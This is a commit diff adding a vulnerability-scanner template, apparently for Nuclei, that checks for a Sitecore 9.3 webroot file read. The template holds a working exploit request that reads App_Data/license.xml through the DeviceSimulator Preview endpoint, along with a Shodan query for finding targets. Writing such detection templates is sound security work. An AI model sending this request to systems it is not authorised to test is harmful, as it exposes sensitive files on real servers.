Create sitecore-lfi.yaml
parent
8b2030bbb2
commit
eb322cc354
|
@ -0,0 +1,29 @@
|
|||
id: sitecore-lfi
|
||||
|
||||
info:
|
||||
name: Sitecore 9.3 - Webroot File Read
|
||||
author: DhiyaneshDK
|
||||
severity: high
|
||||
reference:
|
||||
- https://blog.assetnote.io/2023/05/10/sitecore-round-two/
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: "true"
|
||||
shodan-query: title:"Sitecore"
|
||||
tags: sitecore,lfi
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "signedlicense id"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue